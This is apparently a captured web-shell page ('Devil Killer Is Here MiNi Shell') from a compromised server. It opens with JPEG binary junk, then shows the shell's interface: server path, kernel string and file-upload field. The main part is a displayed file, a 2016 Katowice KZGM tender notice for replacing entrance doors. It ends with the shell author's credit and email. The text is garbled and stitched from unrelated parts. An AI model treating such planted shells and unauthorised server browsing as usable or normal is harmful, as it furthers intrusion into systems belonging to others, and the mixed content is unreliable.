JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/160487-N-2016.html

<p class="kh_header"><b>Katowice: Wymiana drzwi wejściowych do budynków, lokali mieszkalnych i
użytkowych zarządzanych przez KZGM w Katowicach.</b><br>
<b>Numer ogłoszenia: 160487 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komunalny Zakład Gospodarki Mieszkaniowej , ul. Grażyńskiego 5, 40-126 Katowice, woj. śląskie, tel. 32 258 20 21-25, faks 32 258 20 25, 41 63 167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kzgm.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana drzwi wejściowych do budynków, lokali mieszkalnych i
użytkowych zarządzanych przez KZGM w Katowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem
zamówienia są roboty budowlane polegające na Wymianie drzwi wejściowych do budynków,
lokali mieszkalnych i użytkowych zarządzanych przez KZGM w Katowicach. Zamówienie
podzielone jest na 2 części: Część 1 obejmuje wymianę 19 sztuk drzwi do lokali
mieszkalnych przy: ul. 9 Maja 5/15, ul. Działkowej 32/3, ul. Strzelców Bytomskich 51/3, ul.
Wiosny Ludów 28/3, ul. Batorego 5/1, ul. Bugli 2/1, ul. Jagiellońskiej 19/5, ul. Jagiellońskiej
27/10, ul. Konopnickiej 2/13, ul. Podgórnej 5/1, ul. Sienkiewicza 6/6, ul. Sienkiewicza 14/6,
ul. Skłodowskiej 27/24, ul. Wita Stwosza 4a/1, ul. Mieszka I 9/11, ul. Mieszka I 5/190, ul.
Mieszka I 5/79, ul. Tysiąclecia 80/171, ul. Tysiąclecia 86b/174, znajdujących się w rejonie
Oddziałów Eksploatacji Budynków nr 2, 4, 6 KZGM w Katowicach. Część 2 obejmuje
wymianę 40 sztuk drzwi do: budynków przy ul. Gnieźnieńskiej 4, ul. Katowickiej 3, ul.
Markiefki 80, ul. Czarneckiego 3, ul. Kozielskiej 1, ul. Kozielskiej 1a, ul. Szenwalda 61, ul.
Bronisławy 27b, ul. Małachowskiego 17, ul. Grunwaldzkiej 6A, ul. Grunwaldzkiej 7, ul.
Gnieźnieńskiej 2; lokali mieszkalnych przy ul. Misjonarzy Oblatów 23a/5, ul. Katowickiej
48b/34, ul. Szczecińskiej 16c/34, ul. Górnika 5a/14, ul. Kotlarza 11/14, ul. Katowickiej 31a/8,
ul. Misjonarzy Oblatów 31/2, ul. Mikusińskiego 14/6, ul. Korfantego 8/19, ul. Korfantego
8/71, ul. Kozielskiej 8/8, ul. Pawła 7/1, ul. Sokolskiej 14/11, ul. Teatralnej 9a/7, ul.
Piastowskiej 2/23, ul. Piastowskiej 2/52, ul. Piastowskiej 2/77, ul. Reja 6/12, ul. Hałubki 1/3,
ul. Mariackiej 5a/15, ul. Mikołowskiej 11/2, ul. Borowej 23/2, ul. Kossak-Szczuckiej 45a/3,
ul. Słupskiej 4/18, ul. Panewnickiej 98/3, ul. Kijowskiej 30/2, ul. Koszalińskiej 1b/37;lokalu
użytkowego przy ul. Mariackiej 26; znajdujących się w rejonie Oddziałów Eksploatacji
Budynków nr 1, 3, 5 KZGM w Katowicach..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w
art. 67 ust. 1 pkt 6 ustawy, stanowiących nie więcej niż 50% wartości zamówienia
podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.42.11.31-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełniania warunku bęzie złożenie oświadczenia na podstawie
art 22 ust 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełniania warunku bęzie złożenie oświadczenia na podstawie
art 22 ust 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełniania warunku bęzie złożenie oświadczenia na podstawie
art 22 ust 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełniania warunku bęzie złożenie oświadczenia na podstawie
art 22 ust 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełniania warunku bęzie złożenie oświadczenia na podstawie
art 22 ust 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca powinien również złożyć następujące dokumenty: a) wypełniony formularz
ofertowy - Załącznik nr 1a, 1b do SIWZ - oddzielny dla każdej części zamówienia; b)
pełnomocnictwo do reprezentowania Wykonawcy/ów złożone w oryginale bądź kopii
notarialnie poświadczonej za zgodność z oryginałem; c) kosztorysy ofertowe uproszczone,
wypełnione na podstawie załączonych przedmiarów robót stanowiących Załącznik nr 6 do
SIWZ. Zamawiający zaleca sporządzenie oddzielnego kosztorysu dla każdego
lokalu/budynku. Inne oświadczenia, które należy złożyć wraz z ofertą - zgodnie z
Załącznikiem nr 1a, 1b do SIWZ: a) Oświadczenie o akceptacji warunków płatności
określonych przez Zamawiającego; b) Oświadczenie o zapoznaniu się z warunkami
zamówienia i ich akceptacji bez zastrzeżeń; c) Oświadczenie o związaniu ofertą na czas
wskazany w specyfikacji; d) Oświadczenie o zapoznaniu się z wzorem umowy i akceptacji
bez zastrzeżeń; e) Oświadczenie, iż oferowany przedmiot zamówienia jest zgodny z
wymaganiami i warunkami opisanymi w ustawie oraz określonymi przez zamawiającego w
SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja na wykonane roboty budowlane - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zmiany terminu zakończenia umowy, jeżeli w terminie przewidzianym ustawowo od daty
wystąpienia Wykonawcy o wydanie decyzji lub innego dokumentu niezbędnego do
prawidłowej realizacji przedmiotu umowy, właściwy organ administracji lub inny podmiot
nie wydały stosownego dokumentu, może nastąpić przedłużenie umowy o czas wymuszonej
przerwy pomiędzy ustawowym terminem a rzeczywistą datą wydania dokumentu. 2) Zmiany
terminu zakończenia umowy, jeżeli zaistniały przyczyny niezależne od działania Stron,
których przy zachowaniu wszelkich należytych środków nie można uniknąć ani im zapobiec,
w szczególności: a) siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego,
zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć
nawet przy zachowaniu najwyższej staranności a które uniemożliwia Wykonawcy wykonanie
przedmiotu umowy. W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć
wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich
zobowiązań umownych, powstałego na skutek działania siły wyższej. (Pod pojęciem siły
wyższej rozumie się w szczególności zdarzenia i okoliczności takie jak: klęska żywiołowa,
działania wojenne, rebelie, terroryzm, rewolucja, powstanie, inwazja, bunt, zamieszki, strajk
spowodowany przez inne osoby nie związane z realizacją inwestycji itp.), protesty
mieszkańców lub innych osób prawnych i fizycznych, b) wystąpienie niewypałów,
niewybuchów, innych przedmiotów stanowiących zagrożenie, c) okoliczności leżących po
stronie Zamawiającego i nie wynikających z przyczyn leżących po stronie Wykonawcy (np.
wstrzymanie, zawieszenie, przerwa w realizacji Inwestycji). d) warunków
uniemożliwiających realizację robót budowlanych z przyczyn technologicznych przez okres
powyżej 2 tygodni, e) realizowania przedmiotu umowy przy zastosowaniu innych rozwiązań
technicznych, technologicznych lub materiałowych ze względu na zmiany obowiązującego
prawa lub w sytuacji, gdy zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem
lub wadliwym wykonaniem przedmiotu umowy, f) wykonania przedmiotu umowy jest
uzależnione od wykonania zamówienia dodatkowego. W tym przypadku istnieje możliwość
przesunięcia terminu wykonania przedmiotu umowy o okres niezbędny do wykonania
zamówienia dodatkowego; g) wystąpienia konieczności wykonania robót zgodnie z § 4 ust. 9
lub 10 umowy; h) nieobecność użytkownika lokalu lub odmowa udostępnienia lokalu. Termin
wykonania umowy ulega odpowiednio zmianie o okres trwania okoliczności celem
ukończenia przedmiotu umowy w sposób należyty. Zmiana terminu realizacji przedmiotu
umowy nie wpływa na zmianę wynagrodzenia. 3) Zmiana wynagrodzenia Wykonawcy: a) w
następstwie zmiany będącej skutkiem działań organów państwowych, przez co należy
rozumieć ustawową zmianę obowiązującej stawki podatku VAT lub wprowadzenie nowego
podatku; b) w przypadku rezygnacji z wykonania pewnych robót przewidzianych w
specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót, (robót zaniechanych),
o których mowa w § 1 ust. 6 umowy. Sposób obliczenia wartości tych robót zgodnie z § 4 ust.
11 umowy; c) w przypadku wystąpienia konieczności wykonania robót zamiennych lub
dodatkowych o których mowa § 1 ust. 5 umowy. Sposób obliczenia wartości tych robót
zgodnie z § 4 ust. 9 lub 10 umowy. d) w przypadku rezygnacji z całości robót w danym
lokalu/budynku 4) Zmiana osób przy pomocy, których Wykonawca realizuje przedmiot
umowy - w przypadku braku możliwości wykonywania przedmiotu umowy przez wskazane
osoby, wówczas Wykonawca może powierzyć te czynności innym osobom o kwalifikacjach
(uprawnieniach) spełniających, co najmniej takie warunki, jakie podano w specyfikacji
istotnych warunków zamówienia dla przeprowadzonego postępowania, po wyrażeniu
pisemnej zgody przez Zamawiającego; 5) Zmiana Podwykonawcy, wprowadzenie
Podwykonawcy w zakresie nie przewidzianym w treści oferty złożonej przez Wykonawcę lub
rezygnacja z Podwykonawcy - w przypadku, gdy Wykonawca polegał na zasobach
Podwykonawcy na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień
publicznych tj. w celu wykazania spełniania warunków udziału w postępowaniu o udzielenia
przedmiotowego zamówienia, zmiana podwykonawcy lub rezygnacja z Podwykonawcy jest
dopuszczalna pod warunkiem, że nowy Podwykonawca lub Wykonawca samodzielnie spełnia
je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
6) Zmiana osób przy pomocy, których Zamawiający realizuje przedmiot umowy. Zmiany
wymagają formy pisemnej oraz wyrażenia zgody obu stron pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.kzgm.katowice.pl/zamowienia-publiczne/ogloszenia-o-zamowieniu/na-roboty-budowlane<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział
Organizacji Przetargów KZGM w Katowicach - ul. Mieszka I 2, Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2016 godzina 08:45, miejsce: 40-126 Katowice, ul. Grażyńskiego 5, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com